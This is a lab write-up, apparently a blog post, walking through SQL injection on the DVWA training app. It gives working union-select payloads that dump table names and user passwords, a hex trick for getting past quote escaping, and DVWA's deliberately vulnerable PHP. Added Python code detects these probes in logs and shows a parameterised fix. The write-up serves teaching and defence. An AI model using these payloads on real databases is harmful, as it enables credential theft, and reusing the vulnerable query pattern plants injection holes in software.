DVWA SQL injection

A while ago I gave an advanced CTF session to the juniors (not because I had learned that much, just because I was the senior), and put together a slide deck walking through the manual SQL injection process and the various more advanced SQL injection techniques I knew about; I feel quite familiar with the material now.

This is a brief write-up for my own reference.

0x00 Introduction

SQL injection, put simply, happens when user input is not validated before being used in a query: a malicious user supplies a crafted statement, it is assembled into SQL that the database executes, and the consequences can be as serious as the whole database being dumped.

0x01 DVWA in practice

1. Low

(1) Determine whether there is an injection point, and what type it is

Input 1' and '1'='1 # (the # comments out whatever follows): a normal result is returned.

Input 1' and '1'='2 #: no output.

This confirms an injection point, and that the parameter is enclosed in single quotes (string type).

(2) Determine the number of columns with order by

order by n raises an error if column n does not exist. Input 1' order by 2 # (returns normally), then 1' order by 3 # (errors out).

This shows the table being queried has two columns.

(3) Use union select with SQL built-in functions to get the current database name and version

union select requires the column counts of the two queries to match, which is why the column count of the current table had to be determined first. Input -1' union select 1,2 # to find the echo positions (the first query matches nothing, so what is displayed is naturally the second query):

Both positions are echoed, so a built-in function can be placed in either field: -1' union select database(),2 # returns the name of the current database.

(4) Use information_schema to get table names, column names and field values

MySQL ships with an information_schema database containing, among others, tables (information about every existing table), columns (all column information) and the list of databases.

group_concat joins all query results into a single field, so the payloads can be built as:

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema="dvwa" #

-1' union select 1,group_concat(column_name) from information_schema.columns where table_name="users" #

-1' union select user,password from users #
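From the defender's side, the probes above leave a recognisable trail in the web server's access log: a quote followed by a comment marker, order by with an increasing number, union select, and lookups against information_schema. The following is an added example, not code from the original post or from DVWA; the log lines are constructed for it (the path mirrors DVWA's sqli page, but nothing talks to a server), and the pattern names are my own.

```python
"""Added example (not part of the original post): scan access-log lines
for the probes used in the low-level walkthrough above.
The log lines are constructed; the path mirrors DVWA's sqli page."""
import re
from urllib.parse import parse_qs, urlparse

# One regex per probe type described on the page.
PATTERNS = {
    "quote_comment": re.compile(r"'[^']*(#|--)\s*$"),           # 1' ... #
    "order_by": re.compile(r"\border\s+by\s+\d+", re.I),        # 1' order by 3 #
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{2,}\b", re.I),     # 0x7573657273 for users
}

# Common-log-style request line: ip, [time], "METHOD path proto", status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

# Constructed sample log; the id values are the write-up's payloads, URL-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2024:10:01:02 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 1432
10.0.0.5 - - [10/Jan/2024:10:01:09 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27+order+by+3+%23&Submit=Submit HTTP/1.1" 200 1210
10.0.0.5 - - [10/Jan/2024:10:01:15 +0000] "GET /dvwa/vulnerabilities/sqli/?id=-1%27+union+select+1%2Cgroup_concat%28table_name%29+from+information_schema.tables+where+table_schema%3D%22dvwa%22+%23&Submit=Submit HTTP/1.1" 200 1588
10.0.0.9 - - [10/Jan/2024:10:02:00 +0000] "GET /dvwa/vulnerabilities/sqli/?id=-1+union+select+1%2Cgroup_concat%28column_name%29+from+information_schema.columns+where+table_name%3D0x7573657273+%23&Submit=Submit HTTP/1.1" 200 1500
""".splitlines()


def classify_value(value: str) -> list:
    """Sorted names of every pattern matching an already-decoded parameter value."""
    return sorted(name for name, rx in PATTERNS.items() if rx.search(value))


def scan_log(lines) -> list:
    """One hit per request whose id parameter matches at least one pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path, status = m.groups()
        # parse_qs percent-decodes and turns '+' into spaces, so the value is
        # inspected exactly as PHP's $_GET['id'] would see it.
        params = parse_qs(urlparse(path).query, keep_blank_values=True)
        for value in params.get("id", []):
            tags = classify_value(value)
            if tags:
                hits.append({"ip": ip, "status": int(status), "id": value, "tags": tags})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['status']} {hit['tags']} id={hit['id']!r}")
```

Decoding the query string before matching matters: the same probe looks entirely different in its raw, percent-encoded form, and matching on the decoded value is what keeps a single pattern set usable.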

2. Medium

<?php

if (isset($_GET['Submit'])) {

    // Retrieve data

    $id = $_GET['id'];
    $id = mysql_real_escape_string($id);

    // $id is interpolated without quotes, so escaping quotes does not
    // affect a payload that contains none
    $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";

    $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
    
    $num = mysql_numrows($result);

    $i=0;

    while ($i < $num) {

        $first = mysql_result($result,$i,"first_name");
        $last = mysql_result($result,$i,"last_name");
        
        echo '<pre>';
        echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
        echo '</pre>';

        $i++;
    }
}
?>

Compared with the low level, the input is passed through mysql_real_escape_string, which escapes \n, \r, \, ', " and similar characters in the input string.

Testing shows this is a numeric injection; the rest is basically the same as low, except that single and double quotes are escaped here (effectively filtered: quotes cannot be used in the input), so the database name, table name and so on can be written in hexadecimal instead and sent that way.

For example, -1 union select 1,group_concat(column_name) from information_schema.columns where table_name="users" # becomes

-1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #, where 7573657273 is the hex encoding of users.

3. High

<?php    

if (isset($_GET['Submit'])) {

    // Retrieve data

    $id = $_GET['id'];
    $id = stripslashes($id);
    $id = mysql_real_escape_string($id);

    // the query only runs for numeric input, and the value is quoted
    if (is_numeric($id)){

        $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
        $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );

        $num = mysql_numrows($result);

        $i=0;

        while ($i < $num) {

            $first = mysql_result($result,$i,"first_name");
            $last = mysql_result($result,$i,"last_name");
            
            echo '<pre>';
            echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
            echo '</pre>';

            $i++;
        }
    }
}
?>

stripslashes (strips backslashes) and mysql_real_escape_string (escapes quotes and similar characters) are added,

and id is also checked with is_numeric; if it is not numeric, no query is run. I tried hex encoding; it doesn't work.
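The medium and high levels together make the key point: escaping quotes protects a quoted string context only, while an unquoted numeric parameter needs its own validation, and the robust fix is to bind the value as a query parameter rather than interpolate it at all. The following is an added example, not DVWA's code or the post author's; it uses Python with sqlite3 standing in for MySQL, a small stand-in for mysql_real_escape_string written for illustration, and a constructed users table.

```python
"""Added example (not DVWA's code): why the medium level's escaping does not
cover an unquoted numeric parameter, and a hardened lookup that validates
the id and binds it as a parameter. sqlite3 stands in for MySQL."""
import re
import sqlite3

# Stand-in for mysql_real_escape_string: backslash-escape the characters
# that function handles. Constructed for illustration, not PHP's own code.
_ESCAPES = {"\0": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\",
            "'": "\\'", '"': '\\"', "\x1a": "\\Z"}


def escape_string(value: str) -> str:
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def medium_query(user_input: str) -> str:
    """The medium-level pattern: escaped, then interpolated without quotes.
    Returns the SQL text only; it is never executed here."""
    return ("SELECT first_name, last_name FROM users WHERE user_id = "
            + escape_string(user_input))


def is_valid_user_id(user_input: str) -> bool:
    """Whitelist check: only an unsigned decimal integer is accepted."""
    return re.fullmatch(r"[0-9]{1,10}", user_input) is not None


def parse_user_id(user_input: str) -> int:
    if not is_valid_user_id(user_input):
        raise ValueError("user_id must be an unsigned integer")
    return int(user_input)


def lookup_user(conn: sqlite3.Connection, user_input: str) -> list:
    """Hardened lookup: validate first, then bind the value as a parameter
    so the database never interprets it as SQL text."""
    uid = parse_user_id(user_input)
    cur = conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (uid,))
    return cur.fetchall()


def demo_db() -> sqlite3.Connection:
    """Constructed in-memory table shaped like DVWA's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, "
                 "first_name TEXT, last_name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "admin", "admin", "<hash>"),
        (2, "Gordon", "Brown", "<hash>"),
    ])
    return conn


if __name__ == "__main__":
    probe = ("-1 union select 1,group_concat(column_name) from "
             "information_schema.columns where table_name=0x7573657273 #")
    # No quote to escape, so the escaper leaves the probe untouched.
    print(medium_query(probe))
    conn = demo_db()
    print(lookup_user(conn, "1"))
    try:
        lookup_user(conn, probe)
    except ValueError as e:
        print("rejected:", e)
```

The whitelist is deliberately stricter than PHP's is_numeric: it accepts plain digits only, so signs, exponents and whitespace are rejected before the value reaches the database, and the parameter binding means even a value that slipped past validation would be compared as data, not parsed as SQL.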

0x02 Summary

It seems a select cannot be placed inside group_concat, and a further select cannot follow union select; be careful with this, it is not easy to spot when checking.


Source: www.cnblogs.com/dx-yll/p/11966574.html